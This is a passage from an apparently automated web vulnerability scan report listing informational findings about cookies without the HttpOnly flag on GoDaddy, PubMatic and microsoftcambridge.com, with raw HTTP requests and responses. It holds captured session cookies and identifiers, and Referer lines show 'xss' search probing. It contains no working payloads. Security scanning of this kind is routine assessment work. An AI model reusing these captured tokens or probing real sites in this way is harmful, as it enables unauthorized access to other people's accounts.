Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 230

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://mya.godaddy.com/login_redirect.aspx?idpinfo=none&amp;SPKey=GDMYA-M1PWMYAWEB006&amp;myaurl=%2fdefault.aspx">he
...[SNIP]...

11.28. https://idp.godaddy.com/retrieveaccount.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idp.godaddy.com
Path:   /retrieveaccount.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB101 HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB101&target=http%3A%2F%2Fwww.godaddy.com%2Faffiliates%2Faffiliate-program.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; ShopperId1=oemhlbvbcgufsjahmchddfndphwizcii; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:27:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97068


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="https:/
...[SNIP]...

11.29. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:6422714091563403120 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/index.php?status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search&features_hash=P14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:23:54 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:23:54 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

11.30. http://microsoftcambridge.com/Portals/0/app_v_feat.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/app_v_feat.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/app_v_feat.jpg HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=6C7CC4F5569112C2183A9F0A7D693744; path=/
Last-Modified: Fri, 12 Mar 2010 19:45:48 GMT
X-Cache-Info: caching
Content-Length: 10482

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

...[SNIP]...

11.31. http://microsoftcambridge.com/Portals/0/portal.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/portal.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/portal.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=71FAA04E625539F426900B9F2AF66B9D; path=/
Last-Modified: Tue, 24 Mar 2009 15:35:27 GMT
X-Cache-Info: caching
Content-Length: 2



11.32. http://microsoftcambridge.com/Portals/0/rss.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/rss.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/rss.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; path=/
Last-Modified: Fri, 26 Jun 2009 18:39:17 GMT
X-Cache-Info: caching
Content-Length: 3024

.PNG
.
...IHDR.............s+....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.33. http://microsoftcambridge.com/Portals/0/search_results.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/search_results.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/search_results.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=6E444C5C9EE5F0B36535D0D071AE8DCE; path=/
Last-Modified: Fri, 20 Feb 2009 03:31:18 GMT
X-Cache-Info: caching
Content-Length: 5556

.PNG
.
...IHDR...O...!.....YD)l....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.34. http://microsoftcambridge.com/Portals/0/share_icons_new.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/share_icons_new.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/share_icons_new.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=DF1FA1E49AC6733F28ECBEF98F896ADD; path=/
Last-Modified: Mon, 28 Mar 2011 17:48:29 GMT
X-Cache-Info: caching
Content-Length: 7108

.PNG
.
...IHDR..............;......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.35. http://microsoftcambridge.com/Portals/_default/Skins/working/skin.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/_default/Skins/working/skin.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/_default/Skins/working/skin.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=A2D3773D35D890AA5A909771E7CC5C9D; path=/
Last-Modified: Fri, 18 Feb 2011 14:35:44 GMT
X-Cache-Info: caching
Content-Length: 2593

body
{
   background-color: #9a825e;
   background-image: url(/img/microsoft_work_bg.jpg);
   color: #30302e;
}

.header
{
   border-bottom: 4px #4d9f8e solid;
}

.content
{
}

.bottom
{
   background-image: ur
...[SNIP]...

11.36. http://microsoftcambridge.com/Portals/_default/default.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/_default/default.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/_default/default.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=0817D9D7E6BBB58F474E097C28605B0C; path=/
Last-Modified: Fri, 18 Feb 2011 14:26:56 GMT
X-Cache-Info: caching
Content-Length: 12186

.../* background color for the content part of the pages */
.ControlPanel, .PagingTable{width:100%;background-color:#fff;border:#036 1px solid;}
.SkinObject{font-weight:bold;font-size:8.5pt;color:#036
...[SNIP]...

11.37. http://microsoftcambridge.com/Resources/Shared/scripts/initWidgets.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Resources/Shared/scripts/initWidgets.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/Shared/scripts/initWidgets.js HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:42:32 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=F896E78C0F7F2B25089E63BE014483C0; path=/
Last-Modified: Thu, 17 Feb 2011 20:35:56 GMT
X-Cache-Info: caching
Content-Length: 1311

function loadWidgets()
{
if (typeof (DotNetNuke) === "undefined")
Type.registerNamespace("DotNetNuke.UI.WebControls");

if (typeof (DotNetNuke.UI.WebControls.Utility) === "undefin
...[SNIP]...

11.38. http://microsoftcambridge.com/css/print.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /css/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/print.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=F896E78C0F7F2B25089E63BE0